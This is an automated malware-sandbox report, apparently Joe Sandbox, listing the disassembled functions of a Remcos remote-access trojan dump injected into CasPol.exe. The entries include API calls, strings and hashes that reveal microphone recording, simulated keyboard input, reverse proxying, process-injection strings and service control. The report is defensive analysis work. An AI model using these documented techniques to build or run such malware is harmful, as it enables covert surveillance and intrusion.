                                                                                                              • Opcode Fuzzy Hash: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
                                                                                                              • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                                              Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                              • String ID: <$@$@FG$@FG$Temp
                                                                                                              • API String ID: 1107811701-2245803885
                                                                                                              • Opcode ID: 248dd396e914dd493217af7d7ad54a5765675a85d7a0f101f9c1831ea090813b
                                                                                                              • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                              • Opcode Fuzzy Hash: 248dd396e914dd493217af7d7ad54a5765675a85d7a0f101f9c1831ea090813b
                                                                                                              • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                              Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                              • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CurrentProcess
                                                                                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                              • API String ID: 2050909247-4145329354
                                                                                                              • Opcode ID: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                                                                              • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                                              • Opcode Fuzzy Hash: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                                                                              • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                                              Function 00419C85 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                              • String ID:
                                                                                                              • API String ID: 221034970-0
                                                                                                              • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                                                                              • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                                              • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                                                                              • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                                              Function 00446DCB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 00446DDF
                                                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000), ref: 00446ADB
                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                              • _free.LIBCMT ref: 00446DEB
                                                                                                              • _free.LIBCMT ref: 00446DF6
                                                                                                              • _free.LIBCMT ref: 00446E01
                                                                                                              • _free.LIBCMT ref: 00446E0C
                                                                                                              • _free.LIBCMT ref: 00446E17
                                                                                                              • _free.LIBCMT ref: 00446E22
                                                                                                              • _free.LIBCMT ref: 00446E2D
                                                                                                              • _free.LIBCMT ref: 00446E38
                                                                                                              • _free.LIBCMT ref: 00446E46
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                              • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                                              • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                              • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                                              Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Eventinet_ntoa
                                                                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                              • API String ID: 3578746661-4192532303
                                                                                                              • Opcode ID: a05e0ddbe8dc3814f036cc210c9733109e43822c73ea3fc4ff0ab9c9ada38e94
                                                                                                              • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                                              • Opcode Fuzzy Hash: a05e0ddbe8dc3814f036cc210c9733109e43822c73ea3fc4ff0ab9c9ada38e94
                                                                                                              • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                                              Function 00455139 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DecodePointer
                                                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                              • API String ID: 3527080286-3064271455
                                                                                                              • Opcode ID: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                                                                              • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                                              • Opcode Fuzzy Hash: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                                                                              • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                                              Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041B633
                                                                                                              • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                              • API String ID: 1462127192-2001430897
                                                                                                              • Opcode ID: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                                                                              • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                                              • Opcode Fuzzy Hash: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                                                                              • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                                              Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _strftime.LIBCMT ref: 00401AD3
                                                                                                                • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                              • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401B85
                                                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                              • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                              • API String ID: 3809562944-3643129801
                                                                                                              • Opcode ID: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                                                                              • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                                              • Opcode Fuzzy Hash: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                                                                              • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                                              Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                              • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000), ref: 00401A11
                                                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                              • waveInStart.WINMM ref: 00401A81
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                              • String ID: XCG$`=G$x=G
                                                                                                              • API String ID: 1356121797-903574159
                                                                                                              • Opcode ID: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                                                                              • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                                              • Opcode Fuzzy Hash: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                                                                              • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                              Function 0041C96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                                                • Part of subcall function 0041CA1F: RegisterClassExA.USER32 ref: 0041CA6C
                                                                                                                • Part of subcall function 0041CA1F: CreateWindowExA.USER32 ref: 0041CA87
                                                                                                                • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                                              • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                                              • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                                              • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                                              • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                                              • GetMessageA.USER32 ref: 0041CA12
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                              • String ID: Remcos
                                                                                                              • API String ID: 1970332568-165870891
                                                                                                              • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                              • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                                              • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                              • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                              Function 0044B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                                                                              • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                                              • Opcode Fuzzy Hash: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                                                                              • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                                              Function 00452B2A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                                                                              • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                                                                              • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                                                                              • __freea.LIBCMT ref: 00452DAA
                                                                                                              • __freea.LIBCMT ref: 00452DB6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                              • String ID:
                                                                                                              • API String ID: 201697637-0
                                                                                                              • Opcode ID: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                                                                              • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                                              • Opcode Fuzzy Hash: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                                                                              • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                                              Function 004443F9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                              • _free.LIBCMT ref: 00444714
                                                                                                              • _free.LIBCMT ref: 0044472D
                                                                                                              • _free.LIBCMT ref: 0044475F
                                                                                                              • _free.LIBCMT ref: 00444768
                                                                                                              • _free.LIBCMT ref: 00444774
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                              • String ID: C
                                                                                                              • API String ID: 1679612858-1037565863
                                                                                                              • Opcode ID: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                                                                              • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                                              • Opcode Fuzzy Hash: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                                                                              • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                                              Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: tcp$udp
                                                                                                              • API String ID: 0-3725065008
                                                                                                              • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                              • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                              • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                              • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                              Function 00401768 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                                                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401902
                                                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                              • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                              • String ID: T=G$p[G$>G$>G
                                                                                                              • API String ID: 1596592924-2461731529
                                                                                                              • Opcode ID: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                                                                              • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                                              • Opcode Fuzzy Hash: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                                                                              • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                                              Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00406C38
                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00406C80
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00406CC0
                                                                                                              • MoveFileW.KERNEL32 ref: 00406CDD
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00406D08
                                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                              • String ID: .part
                                                                                                              • API String ID: 1303771098-3499674018
                                                                                                              • Opcode ID: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                                                                              • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                                              • Opcode Fuzzy Hash: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                                                                              • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                                              Function 0041A81D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32 ref: 004125A6
                                                                                                                • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                              • _wcslen.LIBCMT ref: 0041A8F6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                              • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                              • API String ID: 37874593-703403762
                                                                                                              • Opcode ID: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                                                                              • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                                              • Opcode Fuzzy Hash: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                                                                              • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                                              Function 00418ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendInput.USER32 ref: 00418B08
                                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
